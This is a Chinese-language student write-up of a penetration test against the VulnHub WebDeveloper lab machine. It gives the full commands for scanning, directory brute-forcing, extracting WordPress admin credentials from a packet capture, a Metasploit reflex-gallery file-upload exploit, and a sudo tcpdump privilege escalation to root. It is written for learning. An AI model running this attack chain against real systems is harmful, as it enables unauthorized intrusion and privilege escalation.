CTF实践
CTFg)HTTP web服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用。
通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用。
系统环境:Kali Linux 2、WebDeveloper靶机来源:https://www.vulnhub.com
实验工具:不限
实验过程
发现目标 (netdiscover),找到WebDeveloper的IP地址
sudo netdiscover -i eth0 -r 192.168.10.0
利用NMAP扫描目标主机,发现目标主机端口开放、服务情况,截图并说明目标提供的服务有哪些?(利用第一次实验知识点)
通过nmap进行扫描
nmap 192.168.234.0/24
由于是在网页(WordPress)上进行的,所以只要找80端口开放的ip
若目标主机提供了HTTP服务,尝试利用浏览器访问目标网站。截图。是否有可用信息?
感觉没有看到什么可用的信息
利用whatweb探测目标网站使用的CMS模板。截图。分析使用的CMS是什么?
whatweb 192.168.234.132
使用的CMS是wordpress
网络搜索wpscan,简要说明其功能。
WPScan是一个扫描WordPress漏洞的黑盒子扫描器,它可以为所有Web开发人员扫描WordPress漏洞并在他们开发前找到并解决问题。我们还使用了Nikto,它是一款非常棒的Web服务器评估工具,我们认为这个工具应该成为所有针对WordPress网站进行的渗透测试的一部分。- WordPress是全球流行的博客网站,全球有上百万人使用它来搭建博客。他使用PHP脚本和Mysql数据库来搭建网站。
Wordpress作为三大建站模板之一,在全世界范围内有大量的用户,这也导致白帽子都会去跟踪WordPress的安全漏洞,Wordpress自诞生起也出现了很多漏洞。Wordpress还可以使用插件、主题。于是Wordpress本身很难挖掘什么安全问题的时候,安全研究者开始研究其插件、主题的漏洞。通过插件,主题的漏洞去渗透Wordpress站点,于是WPScan应运而生,收集Wordpress的各种漏洞,形成一个Wordpress专用扫描器
- WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞,同时还可以实现对未加防护的Wordpress站点暴力破解用户名密码。
- 该扫描器可以实现获取站点用户名,获取安装的所有插件、主题,以及存在漏洞的插件、主题,并提供漏洞信息。同时还可以实现对未加防护的
Wordpress站点暴力破解用户名密码。
使用 Dirb 爆破网站目录。(Dirb 是一个专门用于爆破目录的工具,在 Kali 中默认已经安装,类似工具还有国外的patator,dirsearch,DirBuster, 国内的御剑)截图。找到一个似乎和网络流量有关的目录(路径)。
直接输入:
dirb + ip
找到一个似乎和网络流量有关的目录(路径)为:http://192.168.234.132/ipdata/
浏览器访问该目录(路径),发现一个cap文件。截图。
利用Wireshark分析该数据包,分析TCP数据流。找到什么有用的信息?截图。
通过筛选命令:http.request.method==POST
得到登录的账号和密码
账号:webdeveloper
密码:Te5eQg&4sBS!Yr$)wf%(DcAd
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DUX6U1Mc-1641649949558)(C:\Users\BlackFriday\AppData\Roaming\Typora\typora-user-images\image-20211212170340349.png)]
利用上一步得到的信息进入网站后台。截图(网站管理员账号与操作系统账号是不同概念)
由前面的dirb,发现登录php页面。输入WebDeveloper的IP和/wp-login.php,进入登录页面。
随便输入一个账号和密码,到Burp sure里找刚刚提交信息的地址,找到后去Wireshark筛选http请求类型为post的请求,追踪TCP流可得输入的账号密码。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-I6tlvVIG-1641649949559)(C:\Users\BlackFriday\AppData\Roaming\Typora\typora-user-images\image-20211212170818402.png)]
利用该CMS存在的(插件Plugin)漏洞。
采用方案:利用MeterSploit插件+reflex gallery插件漏洞实现。安装reflex gallery插件。利用该插件可能存在的漏洞。(课本知识点)
安装有漏洞的插件:
1.给这个wordpress安装reflex gallery插件,点击页面的plugins,下载reflex-gallery,放到kali中,点击add new,点击upload plugin
2.安装成功后去激活。如图即为成功:
3.接下来在kali使用msf来控制漏洞:
- 先输入msfconsole打开msf
- 第二次输入use exploit/unix/webapp/wp_reflexgallery_file_upload
- 第三次输入 set rhosts WebDeveloper的IP
- 第四次输入 exploi
出现meterpreter >说明可以控制啦!
- 输入Linux命令来查看一些文件:
meterpreter> ls - 回退到
/var/www/html之后可以看到wp-config.php - 找到一行有wp-config.php,查看里面的内容:kali输入
meterpreter > cat wp-config.php - 在浏览器中输入:WebDeveloper的IP/wp-config.php即可找到数据库的用户和密码
一通操作猛如虎,直接get 到结果
利用该插件漏洞提权
通过上面得到的账号密码进行ssh连接:
ssh webdevelope@192.168.234.132
然后输入密码
连接成功:
尝试查看,输入cat /root/flag.txt
发现权限不足,无法查看
使用sudo -l查看谁能查看:
使用tcpdump执行任意命令(当tcpdump捕获到数据包后会执行指定的命令。)查看当前身份可执行的命令。
-
创建攻击文件:
touch /tmp/exploit -
写入shellcode:
echo 'cat /root/flag.txt' > /tmp/exploit -
赋予可执行权限:
chmod +x /tmp/exploit -
root权限执行:sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root
tcpdump命令详解:
- -i eth0 从指定网卡捕获数据包
- -w /dev/null 将捕获到的数据包输出到空设备(不输出数据包结果)
- -z [command] 运行指定的命令
- -Z [user] 指定用户执行命令
- -G [rotate_seconds] 每rotate_seconds秒一次的频率执行-w指定的转储
- -W [num] 指定抓包数量
所以我们把看flag.txt文件的命令放在exploit文件中,让root通过查看exploit,来执行相关的命令
好耶ヾ(✿゚▽゚)ノ
进行查看相关的
可选方案1:
建立会话后,查看wp-config.php获得账号及口令。(配置文件很重要,各种系统的配置文件)。
获得的账号、口令是用来访问什么目标?注意与第7步描述比较。
实验小结
通过本次CTF实战,模拟了如何在靶机中窃取需要的某个文件数据(flag.txt),让我知道渗透在现实生活中可能的应用。
1.通过扫描发现目标主机,根据主机开放的80端口找到其的网页
2.通过Kali的命令Dirb 爆破网站目录找到cap文件和怎么通过Wireshark、Burp sure分析 “cap” 文件,找到网站管理后台账号密码。
3.怎么利用漏洞和在kali使用msf来控制漏洞来获得服务器的账号密码。
窃取需要的某个文件数据(flag.txt),让我知道渗透在现实生活中可能的应用。
1.通过扫描发现目标主机,根据主机开放的80端口找到其的网页
2.通过Kali的命令Dirb 爆破网站目录找到cap文件和怎么通过Wireshark、Burp sure分析 “cap” 文件,找到网站管理后台账号密码。
3.怎么利用漏洞和在kali使用msf来控制漏洞来获得服务器的账号密码。
- 使用tcpdump利用root权限获取相关的flag
58
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
